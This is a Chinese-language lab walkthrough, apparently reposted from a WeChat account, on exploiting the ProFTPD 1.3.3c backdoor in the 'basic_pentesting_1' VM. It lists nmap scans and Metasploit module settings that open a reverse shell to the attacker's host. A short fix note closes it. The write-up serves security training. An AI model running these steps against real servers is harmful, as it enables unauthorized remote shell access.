FTP服务后门实战

admin 2024年1月5日16:33:48评论11 views字数 1015阅读3分23秒阅读模式

影响范围

ProFTPD 1.3.3c

漏洞介绍

ProFTPD是一种高度可定制和可扩展的FTP服务器软件,它提供了一种安全和可靠的方式来传输文件和数据,它支持多种操作系统,包括类Unix系统(例如:Linux、FreeBSD等)和Windows,在其1.3.3c软件包中存在一处命令执行的后门漏洞,攻击者可以直接进行命令执行获取服务器端的Shell权限

漏洞利用

这里以"basic_pentesting_1"靶机中的ProFTPD 1.3.3c版本为例进行漏洞的检测与利用,首先执行以下命令来获取目标主机的IP地址信息

nmap -sn 192.168.204.0/24

FTP服务后门实战

服务端口扫描:

nmap -A -T4 -v 192.168.204.144

FTP服务后门实战

上面的扫描结果可以看到目标服务器开启了21、22、80端口,而且注意到目标服务器中的FTP服务版本为ProFTPD 1.3.3c,所以我们可以直接利用该服务对应的漏洞对目标服务器实施攻击操作,首先我们使用searchsploit进行漏洞的检索操作

searchsploit ProFTOD 1.3.3c

FTP服务后门实战

随后我们直接在MSF中检索漏洞利用模块

msfconsolesearch ProFTOD 1.3.3c

FTP服务后门实战

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.204.144RHOSTS => 192.168.204.144msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RPORT 21RPORT => 21msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reversepayload => cmd/unix/reversemsf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.204.135lhost => 192.168.204.135msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options

FTP服务后门实战

随后执行载荷并成功获取到目标服务器的权限

FTP服务后门实战

修复建议

升级到FTPD的最新版本

参考连接

https://www.cnvd.org.cn/flaw/show/CNVD-2010-3023

原文始发于微信公众号(七芒星实验室):FTP服务后门实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月5日16:33:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   FTP服务后门实战http://cn-sec.com/archives/2367411.html

发表评论

匿名网友 填写信息